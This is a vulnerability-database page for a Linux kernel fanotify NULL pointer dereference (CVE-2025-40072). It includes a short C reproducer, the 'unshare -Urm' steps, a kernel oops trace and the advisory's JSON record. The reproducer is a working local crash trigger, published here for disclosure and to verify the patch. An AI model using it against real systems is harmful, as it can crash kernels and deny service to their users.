GHSA-W5HW-P7RF-8672

Vulnerability from github – Published: 2025-10-28 12:30 – Updated: 2025-10-28 12:30
VLAI?
Details

In the Linux kernel, the following vulnerability has been resolved:

fanotify: Validate the return value of mnt_ns_from_dentry() before dereferencing

The function do_fanotify_mark() does not validate if mnt_ns_from_dentry() returns NULL before dereferencing mntns->user_ns. This causes a NULL pointer dereference in do_fanotify_mark() if the path is not a mount namespace object.

Fix this by checking mnt_ns_from_dentry()'s return value before dereferencing it.

Before the patch

$ gcc fanotify_nullptr.c -o fanotify_nullptr $ mkdir A $ ./fanotify_nullptr Fanotify fd: 3 fanotify_mark: Operation not permitted $ unshare -Urm Fanotify fd: 3 Killed

int main(void){ int ffd; ffd = fanotify_init(FAN_CLASS_NOTIF | FAN_REPORT_MNT, 0); if(ffd < 0){ perror("fanotify_init"); exit(EXIT_FAILURE); }

printf("Fanotify fd: %d\n",ffd);

if(fanotify_mark(ffd, FAN_MARK_ADD | FAN_MARK_MNTNS,

FAN_MNT_ATTACH, AT_FDCWD, "A") < 0){ perror("fanotify_mark"); exit(EXIT_FAILURE); }

return 0; }

After the patch

$ gcc fanotify_nullptr.c -o fanotify_nullptr $ mkdir A $ ./fanotify_nullptr Fanotify fd: 3 fanotify_mark: Operation not permitted $ unshare -Urm Fanotify fd: 3 fanotify_mark: Invalid argument

[ 25.694973] BUG: kernel NULL pointer dereference, address: 0000000000000038 [ 25.695006] #PF: supervisor read access in kernel mode [ 25.695012] #PF: error_code(0x0000) - not-present page [ 25.695017] PGD 109a30067 P4D 109a30067 PUD 142b46067 PMD 0 [ 25.695025] Oops: Oops: 0000 [#1] SMP NOPTI [ 25.695032] CPU: 4 UID: 1000 PID: 1478 Comm: fanotify_nullpt Not tainted 6.17.0-rc4 #1 PREEMPT(lazy) [ 25.695040] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020 [ 25.695049] RIP: 0010:do_fanotify_mark+0x817/0x950 [ 25.695066] Code: 04 00 00 e9 45 fd ff ff 48 8b 7c 24 48 4c 89 54 24 18 4c 89 5c 24 10 4c 89 0c 24 e8 b3 11 fc ff 4c 8b 54 24 18 4c 8b 5c 24 10 <48> 8b 78 38 4c 8b 0c 24 49 89 c4 e9 13 fd ff ff 8b 4c 24 28 85 c9 [ 25.695081] RSP: 0018:ffffd31c469e3c08 EFLAGS: 00010203 [ 25.695104] RAX: 0000000000000000 RBX: 0000000001000000 RCX: ffff8eb48aebd220 [ 25.695110] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff8eb4835e8180 [ 25.695115] RBP: 0000000000000111 R08: 0000000000000000 R09: 0000000000000000 [ 25.695142] R10: ffff8eb48a7d56c0 R11: ffff8eb482bede00 R12: 00000000004012a7 [ 25.695148] R13: 0000000000000110 R14: 0000000000000001 R15: ffff8eb48a7d56c0 [ 25.695154] FS: 00007f8733bda740(0000) GS:ffff8eb61ce5f000(0000) knlGS:0000000000000000 [ 25.695162] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 25.695170] CR2: 0000000000000038 CR3: 0000000136994006 CR4: 00000000003706f0 [ 25.695201] Call Trace: [ 25.695209] [ 25.695215] __x64_sys_fanotify_mark+0x1f/0x30 [ 25.695222] do_syscall_64+0x82/0x2c0 ...

Show details on source website
To clipboard 

{
  "affected": [],
  "aliases": [
    "CVE-2025-40072"
  ],
  "database_specific": {
    "cwe_ids": [],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-28T12:15:41Z",
    "severity": null
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nfanotify: Validate the return value of mnt_ns_from_dentry() before dereferencing\n\nThe function do_fanotify_mark() does not validate if\nmnt_ns_from_dentry() returns NULL before dereferencing mntns-\u003euser_ns.\nThis causes a NULL pointer dereference in do_fanotify_mark() if the\npath is not a mount namespace object.\n\nFix this by checking mnt_ns_from_dentry()\u0027s return value before\ndereferencing it.\n\nBefore the patch\n\n$ gcc fanotify_nullptr.c -o fanotify_nullptr\n$ mkdir A\n$ ./fanotify_nullptr\nFanotify fd: 3\nfanotify_mark: Operation not permitted\n$ unshare -Urm\nFanotify fd: 3\nKilled\n\nint main(void){\n    int ffd;\n    ffd = fanotify_init(FAN_CLASS_NOTIF | FAN_REPORT_MNT, 0);\n    if(ffd \u003c 0){\n        perror(\"fanotify_init\");\n        exit(EXIT_FAILURE);\n    }\n\n    printf(\"Fanotify fd: %d\\n\",ffd);\n\n    if(fanotify_mark(ffd, FAN_MARK_ADD | FAN_MARK_MNTNS,\nFAN_MNT_ATTACH, AT_FDCWD, \"A\") \u003c 0){\n        perror(\"fanotify_mark\");\n        exit(EXIT_FAILURE);\n    }\n\nreturn 0;\n}\n\nAfter the patch\n\n$ gcc fanotify_nullptr.c -o fanotify_nullptr\n$ mkdir A\n$ ./fanotify_nullptr\nFanotify fd: 3\nfanotify_mark: Operation not permitted\n$ unshare -Urm\nFanotify fd: 3\nfanotify_mark: Invalid argument\n\n[   25.694973] BUG: kernel NULL pointer dereference, address: 0000000000000038\n[   25.695006] #PF: supervisor read access in kernel mode\n[   25.695012] #PF: error_code(0x0000) - not-present page\n[   25.695017] PGD 109a30067 P4D 109a30067 PUD 142b46067 PMD 0\n[   25.695025] Oops: Oops: 0000 [#1] SMP NOPTI\n[   25.695032] CPU: 4 UID: 1000 PID: 1478 Comm: fanotify_nullpt Not\ntainted 6.17.0-rc4 #1 PREEMPT(lazy)\n[   25.695040] Hardware name: VMware, Inc. VMware Virtual\nPlatform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020\n[   25.695049] RIP: 0010:do_fanotify_mark+0x817/0x950\n[   25.695066] Code: 04 00 00 e9 45 fd ff ff 48 8b 7c 24 48 4c 89 54\n24 18 4c 89 5c 24 10 4c 89 0c 24 e8 b3 11 fc ff 4c 8b 54 24 18 4c 8b\n5c 24 10 \u003c48\u003e 8b 78 38 4c 8b 0c 24 49 89 c4 e9 13 fd ff ff 8b 4c 24 28\n85 c9\n[   25.695081] RSP: 0018:ffffd31c469e3c08 EFLAGS: 00010203\n[   25.695104] RAX: 0000000000000000 RBX: 0000000001000000 RCX: ffff8eb48aebd220\n[   25.695110] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff8eb4835e8180\n[   25.695115] RBP: 0000000000000111 R08: 0000000000000000 R09: 0000000000000000\n[   25.695142] R10: ffff8eb48a7d56c0 R11: ffff8eb482bede00 R12: 00000000004012a7\n[   25.695148] R13: 0000000000000110 R14: 0000000000000001 R15: ffff8eb48a7d56c0\n[   25.695154] FS:  00007f8733bda740(0000) GS:ffff8eb61ce5f000(0000)\nknlGS:0000000000000000\n[   25.695162] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[   25.695170] CR2: 0000000000000038 CR3: 0000000136994006 CR4: 00000000003706f0\n[   25.695201] Call Trace:\n[   25.695209]  \u003cTASK\u003e\n[   25.695215]  __x64_sys_fanotify_mark+0x1f/0x30\n[   25.695222]  do_syscall_64+0x82/0x2c0\n...",
  "id": "GHSA-w5hw-p7rf-8672",
  "modified": "2025-10-28T12:30:17Z",
  "published": "2025-10-28T12:30:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40072"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/62e59ffe8787b5550ccff70c30b6f6be6a3ac3dd"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/73ce2a774ad6497cbd48dc4f8a5d699bc417f3fa"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.